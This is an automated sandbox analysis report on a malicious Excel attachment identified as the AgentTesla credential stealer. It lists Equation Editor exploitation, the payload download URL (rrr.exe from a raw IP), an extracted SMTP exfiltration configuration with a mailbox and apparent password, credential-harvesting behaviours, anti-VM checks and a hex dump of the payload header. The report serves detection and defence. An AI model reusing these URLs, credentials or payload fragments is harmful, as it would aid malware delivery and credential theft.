Analysis Report ORDER 9387383900.xlsx

Overview

General Information

Sample Name:	ORDER 9387383900.xlsx
Analysis ID:	385366
MD5:	6cd928e3be0956061f518082a5acb60b
SHA1:	0e377a42bd4197fceb15e458ccfb46445e7f0132
SHA256:	19a975e2303b2394ab8ec3550799702b6a6a1eb166c588e90619e2c117baf73f
Tags:	VelvetSweatshopxlsx
Infos:
Most interesting Screenshot:

Detection

AgentTesla

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Multi AV Scanner detection for submitted file

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Sigma detected: EQNEDT32.EXE connecting to internet

Sigma detected: File Dropped By EQNEDT32EXE

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Yara detected AgentTesla

Yara detected AntiVM3

.NET source code contains very large array initializations

Drops PE files to the user root directory

Injects a PE file into a foreign processes

Machine Learning detection for dropped file

Office equation editor drops PE file

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file access)

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Contains functionality to call native functions

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Document misses a certain OLE stream usually present in this Microsoft Office document type

Downloads executable code via HTTP

Drops PE files

Drops PE files to the user directory

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Office Equation Editor has been started

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Uses SMTP (mail sending)

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Signatures

AV Detection:

Antivirus detection for URL or domain

Source: http://198.23.213.61/rrr.exe

Avira URL Cloud: Label: malware

Found malware configuration

Source: 5.2.vbc.exe.400000.1.unpack

Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "SMTP Info": "razilogs@razilogs.comDANIEL3116us2.smtp.mailhostbox.com"}

Multi AV Scanner detection for submitted file

Source: ORDER 9387383900.xlsx

Virustotal: Detection: 33%

Perma Link

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\rrr[1].exe	Joe Sandbox ML: detected
Source: C:\Users\Public\vbc.exe	Joe Sandbox ML: detected

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe			Jump to behavior

Office Equation Editor has been started

Source: unknown

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Software Vulnerabilities:

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Users\Public\vbc.exe

Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h

4_2_006684D8

Potential document exploit detected (performs DNS queries)

Source: global traffic

DNS query: name: us2.smtp.mailhostbox.com

Potential document exploit detected (performs HTTP gets)

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 198.23.213.61:80

Potential document exploit detected (unknown TCP traffic)

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 198.23.213.61:80

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Source: Traffic

Snort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.22:49166 -> 208.91.199.225:587

Detected TCP or UDP traffic on non-standard ports

Source: global traffic

TCP traffic: 192.168.2.22:49166 -> 208.91.199.225:587

Downloads executable code via HTTP

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 12 Apr 2021 09:34:49 GMTServer: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27Last-Modified: Mon, 12 Apr 2021 08:37:15 GMTETag: "ddc00-5bfc26bb7fa1d"Accept-Ranges: bytesContent-Length: 908288Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 bb 06 74 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 bc 0c 00 00 1e 01 00 00 00 00 00 fe da 0c 00 00 20 00 00 00 00 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 0e 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 b0 da 0c 00 4b 00 00 00 00 e0 0c 00 00 1c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0e 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 04 bb 0c 00 00 20 00 00 00 bc 0c 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 00 1c 01 00 00 e0 0c 00 00 1c 01 00 00 be 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 0e 00 00 02 00 00 00 da 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 da 0c 00 00 00 00 00 48 00 00 00 02 00 05 00 9c ed 0b 00 14 ed 00 00 03 00 00 00 01 00 00 06 f8 13 02 00 98 d9 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 30 02 00 23 00 00 00 00 00 00 00 2b 02 26 16 00 00 28 01 00 00 0a 28 02 00 00 0a 00 de 02 00 dc 00 28 0b 00 00 06 02 6f 03 00 00 0a 00 2a 00 01 10 00 00 02 00 05 00 0e 13 00 02 00 00 00 00 13 30 02 00 23 01 00 00 01 00 00 11 2b 02 26 16 00 38 0a 01 00 00 02 16 38 e8 00 00 00 00 2b 3a 06 1f 63 61 0a 2b 1e 07 1f 6a 61 0b 07 1f 6f 58 45 04 00 00 00 0a 00 00 00 15 00 00 00 27 00 00 00 5d 00 00 00 1f 5d 28 9d 01 00 06 0b 2b d8 d0 01 00 00 06 26 1f fb 0b 2b cd 1f 62 28 9d 01 00 06 0a 1f 64 28 dc 01 00 06 0b 2b bb 06 1f 5c 58 45 0a 00 00 00 0a 00 00 00 13 00 00 00 21 00 00 00 2a 00 00 00 39 00 00 00 48 00 00 00 56 00 00 00 5f 00 00 00 7a 00 00 00 91 00 00 00 1f f8 0b 2b 85 38 79 ff ff ff 00 1f ce 0a 38 70 ff ff ff 00 1f 6a 28 9d 01 00 06 0a 38 62 ff ff ff 00 1f c4 0a 38 59 ff ff ff 02 17 28 07 00 00 0a 1f c9 0a 38 4a ff ff ff 02 17 28 08 00 00 0a 1f c6 0a 38 3b ff ff ff d0 03 0

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 208.91.199.225 208.91.199.225

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS

Uses SMTP (mail sending)

Source: global traffic

TCP traffic: 192.168.2.22:49166 -> 208.91.199.225:587

Uses a known web browser user agent for HTTP communication

Source: global traffic

HTTP traffic detected: GET /rrr.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.23.213.61Connection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.61
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.61
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.61
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.61
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.61
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.61
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.61
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.61
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.61
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.61
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.61
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.61
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.61
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.61
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.61
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.61
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.61
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.61
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.61
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.61
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.61
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.61
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.61
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.61
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.61
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.61
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.61
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.61
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.61
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.61
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.61
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.61
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.61
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.61
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.61
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.61
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.61
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.61
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.61
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.61
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.61
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.61
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.61
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.61
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.61
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.61
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.61
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.61
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.61
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.213.61

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9C9F6B5.emf

Jump to behavior

Source: global traffic

Source: unknown

DNS traffic detected: queries for: us2.smtp.mailhostbox.com

Source: vbc.exe, 00000005.00000002.2345878232.0000000002451000.00000004.00000001.sdmp	String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: vbc.exe, 00000005.00000002.2345878232.0000000002451000.00000004.00000001.sdmp	String found in binary or memory: http://DynDns.comDynDNS
Source: vbc.exe, 00000005.00000002.2345878232.0000000002451000.00000004.00000001.sdmp	String found in binary or memory: http://htJAdA.com
Source: vbc.exe, 00000005.00000002.2346816139.0000000005E40000.00000002.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: vbc.exe, 00000004.00000002.2152952419.00000000025C1000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: vbc.exe, 00000005.00000002.2346025048.0000000002598000.00000004.00000001.sdmp	String found in binary or memory: http://us2.smtp.mailhostbox.com
Source: vbc.exe, 00000005.00000002.2346816139.0000000005E40000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.comPA
Source: F3AA532.emf.0.dr	String found in binary or memory: http://www.day.com/dam/1.0
Source: vbc.exe, 00000005.00000002.2345938081.00000000024DA000.00000004.00000001.sdmp	String found in binary or memory: https://api.ipify.org%
Source: vbc.exe, 00000005.00000002.2345878232.0000000002451000.00000004.00000001.sdmp	String found in binary or memory: https://api.ipify.org%GETMozilla/5.0
Source: vbc.exe, 00000005.00000002.2345994356.000000000255A000.00000004.00000001.sdmp, vbc.exe, 00000005.00000002.2346039166.00000000025A9000.00000004.00000001.sdmp	String found in binary or memory: https://bfdUomDwe8FRPCAbrg.com
Source: vbc.exe, 00000004.00000002.2152979139.0000000002609000.00000004.00000001.sdmp	String found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css
Source: vbc.exe, 00000004.00000002.2153220884.00000000035C9000.00000004.00000001.sdmp, vbc.exe, 00000005.00000002.2345331477.0000000000402000.00000040.00000001.sdmp	String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
Source: vbc.exe, 00000005.00000002.2345878232.0000000002451000.00000004.00000001.sdmp	String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Source: Screenshot number: 4	Screenshot OCR: Enable Editing from the 18 . yellow bar above 19 This document is 20 protected 3. Once you have e
Source: Screenshot number: 4	Screenshot OCR: Enable Content from the yellow bar above 21 22 23 24 25 " Z(:)"'""' 27 28 0 29 . 30 31
Source: Screenshot number: 8	Screenshot OCR: Enable Editing from the 18 . yellow bar above 19 This document is 20 protected 3. Once you have e
Source: Screenshot number: 8	Screenshot OCR: Enable Content from the yellow bar above 21 22 23 24 25 " Z(:)"'""' 27 28 0 29 . 30 31
Source: Screenshot number: 12	Screenshot OCR: Enable Content from the yellow bar above 21 22 23 24 25 " Z(:)"''"' 27 28 . 29 30

.NET source code contains very large array initializations

Source: 5.2.vbc.exe.400000.1.unpack, u003cPrivateImplementationDetailsu003eu007b9C7F6A15u002dF507u002d449Bu002dA77Cu002dF679FE507AF2u007d/B98B4337u002d58F8u002d4581u002dA8DCu002d221E532A33BF.cs

Large array initialization: .cctor: array initializer size 11960

Office equation editor drops PE file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\rrr[1].exe			Jump to dropped file

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Source: C:\Users\Public\vbc.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior

Contains functionality to call native functions

Source: C:\Users\Public\vbc.exe	Code function: 4_2_00661BC0 NtQueryInformationProcess,		4_2_00661BC0
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00661BB8 NtQueryInformationProcess,		4_2_00661BB8

Detected potential crypto function

Source: C:\Users\Public\vbc.exe	Code function: 4_2_00216012	4_2_00216012
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00218620	4_2_00218620
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0021A778	4_2_0021A778
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00219850	4_2_00219850
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00215C68	4_2_00215C68
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00218E99	4_2_00218E99
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0021C0A0	4_2_0021C0A0
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0021C0B0	4_2_0021C0B0
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0021932A	4_2_0021932A
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0021C3C1	4_2_0021C3C1
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0021B521	4_2_0021B521
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0021B530	4_2_0021B530
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002145B0	4_2_002145B0
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002145C0	4_2_002145C0
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0021A723	4_2_0021A723
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0021C738	4_2_0021C738
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002188D1	4_2_002188D1
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0021D924	4_2_0021D924
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0021C931	4_2_0021C931
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0021C940	4_2_0021C940
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002179E8	4_2_002179E8
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002119F8	4_2_002119F8
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00215C58	4_2_00215C58
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0021CD89	4_2_0021CD89
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00664051	4_2_00664051
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00666E38	4_2_00666E38
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00662D18	4_2_00662D18
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00664518	4_2_00664518
Source: C:\Users\Public\vbc.exe	Code function: 4_2_006601A8	4_2_006601A8
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00661981	4_2_00661981
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00660478	4_2_00660478
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00660AE8	4_2_00660AE8
Source: C:\Users\Public\vbc.exe	Code function: 4_2_006626B1	4_2_006626B1
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00662710	4_2_00662710
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00666DEA	4_2_00666DEA
Source: C:\Users\Public\vbc.exe	Code function: 4_2_006667F0	4_2_006667F0
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00666BC8	4_2_00666BC8
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00666DAF	4_2_00666DAF
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00661188	4_2_00661188
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00661198	4_2_00661198
Source: C:\Users\Public\vbc.exe	Code function: 5_2_001E5328	5_2_001E5328
Source: C:\Users\Public\vbc.exe	Code function: 5_2_001E6348	5_2_001E6348
Source: C:\Users\Public\vbc.exe	Code function: 5_2_001E5670	5_2_001E5670
Source: C:\Users\Public\vbc.exe	Code function: 5_2_001EB808	5_2_001EB808
Source: C:\Users\Public\vbc.exe	Code function: 5_2_001E208F	5_2_001E208F
Source: C:\Users\Public\vbc.exe	Code function: 5_2_001EC974	5_2_001EC974
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00356A30	5_2_00356A30
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00359830	5_2_00359830
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00354600	5_2_00354600
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0035CC03	5_2_0035CC03
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00350048	5_2_00350048
Source: C:\Users\Public\vbc.exe	Code function: 5_2_003514B8	5_2_003514B8
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00355380	5_2_00355380
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00353248	5_2_00353248
Source: C:\Users\Public\vbc.exe	Code function: 5_2_003584D0	5_2_003584D0
Source: C:\Users\Public\vbc.exe	Code function: 5_2_003552D2	5_2_003552D2
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0035D1E8	5_2_0035D1E8
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00359B0C	5_2_00359B0C

Document misses a certain OLE stream usually present in this Microsoft Office document type

Source: ORDER 9387383900.xlsx

OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

Source: rrr[1].exe.2.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: vbc.exe.2.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: 5.2.vbc.exe.400000.1.unpack, A/b2.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 5.2.vbc.exe.400000.1.unpack, A/b2.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winXLSX@6/10@1/2

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$ORDER 9387383900.xlsx

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRBF96.tmp

Jump to behavior

Source: C:\Users\Public\vbc.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll			Jump to behavior
Source: C:\Users\Public\vbc.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll			Jump to behavior

Source: C:\Users\Public\vbc.exe	WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
Source: C:\Users\Public\vbc.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\Public\vbc.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\Public\vbc.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: vbc.exe, 00000004.00000002.2152979139.0000000002609000.00000004.00000001.sdmp	Binary or memory string: Select * from UnmanagedMemoryStreamWrapper WHERE modelo=@modelo;?
Source: vbc.exe, 00000004.00000002.2152979139.0000000002609000.00000004.00000001.sdmp	Binary or memory string: Select * from Clientes WHERE id=@id;;
Source: vbc.exe, 00000004.00000002.2152979139.0000000002609000.00000004.00000001.sdmp	Binary or memory string: Select * from Aluguel5Erro ao listar Banco sql-UnmanagedMemoryStreamWrapper.INSERT INTO Aluguel VALUES(@clienteID, @data);
Source: vbc.exe, 00000004.00000002.2152979139.0000000002609000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO UnmanagedMemoryStreamWrapper VALUES(@modelo, @fabricante, @ano, @cor);
Source: vbc.exe, 00000004.00000002.2152979139.0000000002609000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
Source: vbc.exe, 00000004.00000002.2152979139.0000000002609000.00000004.00000001.sdmp	Binary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
Source: vbc.exe, 00000004.00000002.2152979139.0000000002609000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO Aluguel VALUES(@clienteID, @data);

Source: ORDER 9387383900.xlsx

Virustotal: Detection: 33%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe	Jump to behavior

Source: C:\Users\Public\vbc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\Public\vbc.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: ORDER 9387383900.xlsx

Initial sample: OLE indicators vbamacros = False

Source: ORDER 9387383900.xlsx

Initial sample: OLE indicators encrypted = True

Data Obfuscation:

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\Public\vbc.exe	Code function: 4_2_00218397 push ebp; iretd	4_2_00218398
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0021D7BC push edx; retf	4_2_0021D7BD
Source: C:\Users\Public\vbc.exe	Code function: 5_2_003522ED pushfd ; ret	5_2_003522F1
Source: C:\Users\Public\vbc.exe	Code function: 5_2_003530C0 pushfd ; retf	5_2_003531A1

Source: initial sample	Static PE information: section name: .text entropy: 7.78593990731
Source: initial sample	Static PE information: section name: .text entropy: 7.78593990731

Persistence and Installation Behavior:

Drops PE files

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\rrr[1].exe			Jump to dropped file

Drops PE files to the user directory

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Boot Survival:

Drops PE files to the user root directory

